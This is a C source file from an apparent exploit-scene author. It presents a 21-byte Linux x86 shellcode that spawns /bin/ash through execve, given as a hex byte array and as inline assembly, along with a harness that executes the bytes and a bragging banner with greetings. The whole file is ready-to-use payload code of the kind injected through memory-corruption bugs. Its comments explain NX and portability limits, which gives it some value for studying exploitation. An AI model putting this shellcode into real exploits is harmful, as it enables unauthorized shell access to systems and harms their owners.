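/*
 * Fri Aug 29 16:29:38 CEST 2003
 *
 * 21 byte execve("/bin/ash",0,0); shellcode for linux x86
 * by zasta (zasta@darkircop.org)
 *
 * no assumptions should work under all circumstances
 * bash has problems with null argv so we use ash
 *
 * can be made shorter by cp /bin/ash ./a and fixing the push
 * well there are tons of ways to make shorter shellcodes
 * for example having /bin/ash\0 somewhere in memory and just "hardcoding"
 * the addr in ebx but this is just a generic example of a versatile
 * short shellcode
 *
 * greetz: sorbo, #darkircop@irc.darkircop.org
 * daphiel & m00kie (hope your honeymoon was allright... male kids!!!)
 * hello to s0lar!!
 *
 * have fun!
 */
#include <stdio.h>   /* printf */
#include <stdlib.h>  /* exit */
#include <string.h>  /* strlen */
#include <unistd.h>  /* getopt */

/*
 * Hex encoding of the instruction sequence in code() below (21 bytes).
 * No byte is 0x00, which is why banner() can report the length with
 * strlen().
 */
char shellcode[] =
    "\x31\xc9\xf7\xe1\x04\x0b\x52\x68"
    "\x2f\x61\x73\x68\x68\x2f\x62\x69"
    "\x6e\x89\xe3\xcd\x80";

/*
 * The same stub as inline assembly (32-bit x86 syntax: int $0x80 and
 * 32-bit pushes, so it does not assemble for a 64-bit target).
 * If execve() succeeds control never comes back to the caller.
 */
void code(void)
{
    __asm__(
        "xor  %ecx,%ecx\n\t"    /* ecx = 0                  -> argv = NULL */
        "mul  %ecx\n\t"         /* eax = edx = 0            -> envp = NULL */
        "addb $0xb,%al\n\t"     /* eax = 11, execve on i386               */
        "push %edx\n\t"         /* NUL that terminates the path string     */
        "push $0x6873612f\n\t"  /* "/ash"                                  */
        "push $0x6e69622f\n\t"  /* "/bin"                                  */
        "mov  %esp,%ebx\n\t"    /* ebx -> "/bin/ash"                       */
        "int  $0x80"            /* system call                             */
    );
}

/* lets l00k l33t w00t */
void banner(void)
{
    /* strlen() yields size_t: %zu, not %d (format/argument mismatch is UB) */
    printf("execve(\"/bin/ash\",0,0); shellcode %zu bytes (short enough? ;)\n"
           "============================================================\n\n"
           " by\n"
           " _\n"
           " ______ _ ___| |_ __ _\n"
           " |_ / _` / __| __/ _` |\n"
           " / / (_| \\__ \\ || (_| |\n"
           " /___\\__,_|___/\\__\\__,_|\n"
           "\t\tzasta@darkricop.org\n\n"
           " the first italian hackgirl\n"
           " ph34r I own even acidburn\n\n\n",
           strlen(shellcode));
}

/*
 * -h  print usage
 * -a  run the inline-assembly version (code())
 * -s  run the byte array (default when no option is given)
 */
int main(int argc, char *argv[])
{
    int opt;
    /*
     * Treat the byte array as a function. shellcode[] sits in writable
     * data, so this only works where that data is also mapped executable;
     * a W^X / NX-enforcing system faults on the call. Converting an object
     * pointer to a function pointer is not portable C either.
     */
    void (*ptr)(void) = (void (*)(void)) &shellcode[0];

    /* getopt() signals end of options with -1, not EOF */
    while ((opt = getopt(argc, argv, "ahs")) != -1) {
        switch (opt) {
        default:   /* unknown option shares the usage path with -h */
        case 'h':
            printf("Usage: %s \n"
                   "-h\tThis lame message\n"
                   "-a\tLaunch asm code\n"
                   "-s\tLaunch hex code\n", argv[0]);
            exit(0);
        case 'a':
            banner();
            code();
            exit(0);   /* unreach if all goes well */
        case 's':
            banner();
            (*ptr)();
            exit(0);   /* ditto */
        }
    }

    /* default just launch our hex code */
    banner();
    (*ptr)();
    exit(0);   /* guess the comment */
}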